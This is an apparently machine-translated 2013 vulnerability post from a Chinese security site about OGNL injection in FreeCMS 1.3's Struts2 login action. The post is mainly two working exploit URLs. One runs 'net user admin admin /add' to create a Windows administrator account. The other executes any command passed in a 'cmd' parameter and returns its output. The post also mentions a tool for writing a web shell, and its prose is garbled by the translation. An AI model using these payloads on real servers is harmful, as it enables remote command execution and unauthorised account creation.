FreeCms command execution(Ognl execution sequence bypass vulnerability reference EXP)-vulnerability warning-the black bar safety net

2013-08-05T00:00:00
ID MYHACK58:62201340084
Type myhack58
Reporter 园长
Modified 2013-08-05T00:00:00

Description

Open source free java CMS - FreeCMS1. 3-Data Objects-mail

Project address: https://code.google.com/p/freecms/

Prior to the announcement of the EXP using a tool is no good, but you can with me before the release of a tool to execute commands, write shell.

Vulnerability description see EXP3 using the line:

Find the login page: http://localhost:8080/ff/login.jsp

Yourself from the source code inside the Get the form parameters, or with the above-mentioned tools for automatic extraction.

And then modify the Submit action: http://localhost:8080/ff/login_login.do?user.loginname=EXP

Select the type As String of the request on the line

Add account: http://localhost:8080/ff/login_login.do?user.loginname=%28%23context[%22xwork. MethodAccessor. denyMethodExecution%2 2]%3D+new+java. lang. Boolean%28false%2 9,%2 0%23_memberAccess[%22allowStaticMethodAccess%2 2]%3d+new+java. lang. Boolean%28true%2 9,%20@java.lang.Runtime@getRuntime%28%29.exec('net user admin admin /add%2 7% 2 9% 2 9%28meh%2 9&z[%28user. loginname%2 9% 2 8%27meh%2 7% 2 9]=true

Someone said the command execution? Where? Oh, the change before the EXP does not solve:

http://localhost:8080/ff/login_login.do?user.loginname=(

%23context["xwork. MethodAccessor. denyMethodExecution"]= new java. lang. Boolean(false),

%23_memberAccess["allowStaticMethodAccess"]=new java. lang. Boolean(true),

%23req=@org.apache.struts2.ServletActionContext@getRequest(),

%23exec=@java.lang.Runtime@getRuntime(). exec(%23req. getParameter(%22cmd%2 2)),

%23iswinreader=new java. io. DataInputStream(%23exec. getInputStream()),

%23buffer=new byte[1 0 0 0],

%23iswinreader. readFully(%23buffer),

%23result=new java. lang. String(%23buffer),

%23response=@org.apache.struts2.ServletActionContext@getResponse(),

%23response. getWriter(). println(%23result)

)

&z[(user. loginname)('meh')]=true&cmd=cmd /c set